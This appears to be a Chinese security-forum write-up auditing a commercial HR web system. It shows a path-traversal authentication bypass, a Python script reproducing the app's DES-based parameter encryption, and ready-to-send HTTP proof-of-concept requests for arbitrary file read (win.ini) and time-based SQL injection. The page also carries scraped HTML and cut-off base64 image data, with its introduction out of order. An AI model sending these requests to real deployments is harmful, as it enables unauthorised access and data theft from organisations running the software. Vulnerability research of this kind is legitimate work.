![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-e3dd68b1c85cf9cb95c3d6d926117aa51a74c819.png)  
前端接受usernumber、i9999、kind三个参数，分别赋值给var3、var4、var5三个变量。而后续逻辑明显可以看到sql语句的拼接，也就是注入点。发现var3和var4可注入，而var5是作为if的判断值。var3参数也经过 PubFunc.decrypt的解密。因此这个接口的注入，var4是比较简单的,var3需要经过解密操作。

0x03 加解密破解
----------

由上方的漏洞审计可知，两个漏洞参数都需要进行解密操作，意味着前端传入的参数值是一个密文。跟进解密方法查看代码。刚好看到加密方法也在上方。

```js
public static String encrypt(String var0) {  
    if (null \== var0) {  
        return "";  
    } else {  
        String var1 = SafeCode.encrypt(var0);  
        var1 = var1.replaceAll("%", "@2HJ5@");  
        var1 = var1.replaceAll("\\\\+", "@2HJB@");  
        var1 = var1.replaceAll(" ", "@2HJ0@");  
        var1 = var1.replaceAll("\\\\/", "@2HJF@");  
        var1 = var1.replaceAll("\\\\?", "@3HJF@");  
        var1 = var1.replaceAll("#", "@2HJ3@");  
        var1 = var1.replaceAll("&amp;", "@2HJ6@");  
        var1 = var1.replaceAll("=", "@3HJD@");  
        var1 = var1.replaceAll("\\r\\n", "").replaceAll("\\n", "").replaceAll("\\r", "");  
        var1 = var1.replaceAll("@", "PAATTP");  
        return var1;  
    }  
}  

public static String decrypt(String var0) {  
    if (null \== var0) {  
        return "";  
    } else {  
        var0 = var0.replaceAll("PAATTP", "@");  
        var0 = var0.replaceAll("@2HJ5@", "%");  
        var0 = var0.replaceAll("@2HJB@", "\\\\+");  
        var0 = var0.replaceAll("@2HJ0@", " ");  
        var0 = var0.replaceAll("@2HJF@", "\\\\/");  
        var0 = var0.replaceAll("@3HJF@", "\\\\?");  
        var0 = var0.replaceAll("@2HJ3@", "#");  
        var0 = var0.replaceAll("@2HJ6@", "&amp;");  
        var0 = var0.replaceAll("@3HJD@", "=");  
        String var1 = SafeCode.decrypt(var0);  
        return var1;  
    }  
}
```

先看加密方法，首先var0参数传入到SafeCode.encrypt方法进行加密，跟进此方法，可以看到使用的是des加解密函数，为对称加密算法，意味着只要有加密密钥，即可正向加密，也可逆向解密。而加密密钥即为下图马赛克的值（这属于厂商敏感信息，不明文展示了）：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-9e6493ffe0ae96dbfb0629d9677e8bc38fe92fc1.png)

搞懂了加解密算法实际为des加解密，然后再回到PubFunc.encrypt方法，可知进行了des加密后，又要把密文的%，+，/等字符（具体看上方代码）进行一个替换，得到最终的密文。而同样的，查看PubFunc.decrypt方法代码，可得是加密的逆向操作，先对密文进行字符串替换，得到des的密文，再进行des解密。使用此逻辑写python加解密脚本，如下：

```js
from Crypto.Cipher import DES
from Crypto.Util.Padding import pad, unpad
from base64 import b64encode, b64decode

def encrypt(key, data):
    key = key.encode('utf-8')
    data = data.encode('utf-8')
    iv = b'\x01\x02\x03\x04\x05\x06\x07\x08'  # 初始化向量
    cipher = DES.new(key, DES.MODE_CBC, iv)
    ct_bytes = cipher.encrypt(pad(data, DES.block_size))
    var1=b64encode(ct_bytes).decode('utf-8')
    var1 = var1.replace("%", "@2HJ5@");
    var1 = var1.replace("+", "@2HJB@");
    var1 = var1.replace(" ", "@2HJ0@");
    var1 = var1.replace("/", "@2HJF@");
    var1 = var1.replace("?", "@3HJF@");
    var1 = var1.replace("#", "@2HJ3@");
    var1 = var1.replace("&amp;", "@2HJ6@");
    var1 = var1.replace("=", "@3HJD@");
    var1 = var1.replace("\r\n", "").replace("\n", "").replace("\r", "");
    var1 = var1.replace("@", "PAATTP");
    return var1

def decrypt(key, encrypted_data):
    key = key.encode('utf-8')
    encrypted_data = encrypted_data.replace("PAATTP", "@");
    encrypted_data = encrypted_data.replace("@2HJ5@", "%");
    encrypted_data = encrypted_data.replace("@2HJB@", "+");
    encrypted_data = encrypted_data.replace("@2HJ0@", " ");
    encrypted_data = encrypted_data.replace("@2HJF@", "/");
    encrypted_data = encrypted_data.replace("@3HJF@", "?");
    encrypted_data = encrypted_data.replace("@2HJ3@", "#");
    encrypted_data = encrypted_data.replace("@2HJ6@", "&amp;");
    encrypted_data = encrypted_data.replace("@3HJD@", "=");
    encrypted_data = b64decode(encrypted_data)
    iv = b'\x01\x02\x03\x04\x05\x06\x07\x08'  # 初始化向量
    cipher = DES.new(key, DES.MODE_CBC, iv)
    pt_bytes = unpad(cipher.decrypt(encrypted_data), DES.block_size)
    return pt_bytes.decode('utf-8')

if __name__ == "__main__":
    key = "xxxxx"
    data = "1' if db_name(1)='master' waitfor delay '0:0:6'--+"

    encrypted_data = encrypt(key, data)
    print("Encrypted:", encrypted_data)
    encrypted_data='0JALorlQogBNgRuaXkp7QCus5DXQ1K1RU60C2QunGQUgKkcXUh9HXukA75IwTpCaGcqFlluMQLvPAATTP2HJFPAATTPgvSl8mZXxPAATTP2HJFPAATTPe2LWnL7Rg2Ceg0zzONMioPAATTP3HJDPAATTP'
    decrypted_data = decrypt(key, encrypted_data)
    print("Decrypted:", decrypted_data)

```

运行示意图：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-fd3b416574241658b2f9458ac5a580688d9fdb65.png)

0x04 最终poc
----------

### DisplayFiles文件读取

读取c:/windows/win.ini，先加密路径：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-a496edaf8715946f564d1552c9d7f407a6440e72.png)  
发送poc:

```js
POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

filepath=Iy4ZOyMhERdhPLlFrJHBaRdJo53c25S1
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-56b1a41de0820e9fbe0167dacf540530fded3a64.png)

### showmediainfo注入

先是简单的i9999参数注入，不走if (var5.equalsIgnoreCase("0"))，即令kind=1，为字符型注入。payload:' waitfor delay '0:0:6'--+  
poc:

```js
POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

kind=1&amp;usernumber=&amp;i9999=12' waitfor delay '0:0:6'--+
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-ac65fc6a0c274206a7698fd34037a73156fdee6b.png)  
然后是usernumber注入，需要进入if (var5.equalsIgnoreCase("0"))，即令kind=0，还需要加密payload:

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-07258504fd16cb20b313fbef6b2a43cf63d24c28.png)  
poc:

```js
POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/1.1
Host: 127.0.0.1:8080
User-Agent:Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

kind=0&amp;usernumber=i8hoHAILh4YkvJtIAayRbk4pSpIEAvWmx22WPMFig6wPAATTP3HJDPAATTP&amp;i9999=
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/04/attach-113a088edec7b7e118bbbabcc5f0ba5fce29a401.png)</textarea>
 <div id=layer-photos-demo>
 <div id=md_view><div class=markdown-body><h2 blockindex=0>0x00 前言</h2>
<p blockindex=1>我只能说，某景漏洞多的一。。。。。。<br>
今天，就捡两个公开过的漏洞进行下审计吧</p>
<h2 blockindex=2>0x01 过滤器查找</h2>
<p blockindex=3>有经验的师傅都知道，此系统很多接口是做了鉴权的，并不能未授权访问。但是，有的接口加白了，可以通过加白接口进行路径穿越绕过鉴权。<br>
废话不多说，开始正题。一般过滤器都会在web.xml里找到对应的接口与类名，搜索单词filter,定位到HireKeywordFilter类</p>
<p blockindex=4><img src="data:image/png;base64,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
查看代码，<code>var3.doFilter(var1, var2);</code>这行代码是调用FilterChain对象的<code>doFilter</code>方法，将ServletRequest对象和ServletResponse对象传递给下一个过滤器或Servlet进行处理。在Servlet过滤器中，通过调用<code>FilterChain</code>的<code>doFilter</code>方法，可以将请求传递给过滤器链中的下一个过滤器，或者如果没有下一个过滤器了，则传递给Servlet进行处理。</p>
<p blockindex=5><img src="data:image/png;base64,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
<img src="data:image/png;base64,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